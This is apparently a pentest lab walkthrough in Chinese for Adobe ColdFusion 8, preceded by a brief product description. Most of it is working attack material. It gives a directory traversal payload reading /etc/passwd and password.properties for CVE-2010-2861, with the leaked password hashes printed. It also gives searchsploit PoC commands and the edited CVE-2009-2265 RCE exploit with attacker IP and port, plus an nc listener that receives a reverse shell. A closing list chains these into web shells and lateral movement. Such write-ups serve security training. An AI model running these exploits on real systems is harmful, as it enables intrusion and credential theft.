ColdFusion
商用的快速應用程式開發平台,在1995年由JJ Allaire開創。ColdFusion最初是為了建立能與資料庫連接的網站而開發的。2.0版本(1996年推出)以後,它成為了一個全面的開發平台,包括一個整合式開發環境以及功能全面的手稿語言。ColdFusion支援的CFML(ColdFusion Markup Language)是一種手稿語言,檔案以*.cfm為檔名,在ColdFusion專用的應用伺服器環境下執行。cfm檔案被編譯器翻譯為對應的C++語言程式,然後執行並向瀏覽器返回結果。它的設計思想被一些人認為非常先進,被一些語言所借鑑。
🔍 1. 發現點
目標系統: Adobe ColdFusion 8
已知漏洞:
目錄遍歷 (Directory Traversal) → CVE-2010-2861
遠端程式碼執行 (Remote Code Execution, RCE) → CVE-2009-2265
使用
searchsploit
尋找漏洞:searchsploit adobe coldfusion
發現 ColdFusion 8 RCE & 目錄遍歷漏洞
🚀 2. 測試Payload
📂 目錄遍歷 (CVE-2010-2861)
驗證漏洞
http://www.example.com/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../etc/passwd
使用 Searchsploit 複製並執行 PoC
searchsploit -p 14641 cp /usr/share/exploitdb/exploits/multiple/remote/14641.py . python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
成功獲取
password.properties
txt複製編輯rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true
💀 RCE (CVE-2009-2265)
下載並執行 RCE Exploit
searchsploit -p 50057 cp /usr/share/exploitdb/exploits/cfm/webapps/50057.py .
修改 Exploit 參數
if __name__ == '__main__': lhost = '10.10.14.55' # 攻擊者 VPN IP lport = 4444 # 監聽端口 rhost = "10.129.247.30" # 目標 IP rport = 8500 # ColdFusion 端口 filename = uuid.uuid4().hex
執行攻擊
python3 50057.py
🎯 3. 取得反向 Shell
開始監聽
nc -lvnp 4444
成功獲取遠端 Shell
Microsoft Windows [Version 6.1.7600] C:\ColdFusion8\runtime\bin>
🔗 5. 連鎖漏洞
✅ ColdFusion 8 目錄遍歷 → 洩露敏感文件 (password.properties
)
✅ 利用 password.properties
嘗試解密管理密碼
✅ ColdFusion 8 RCE → 上傳 Web Shell 獲取遠端存取
✅ 進一步提權或橫向移動
最后更新于
这有帮助吗?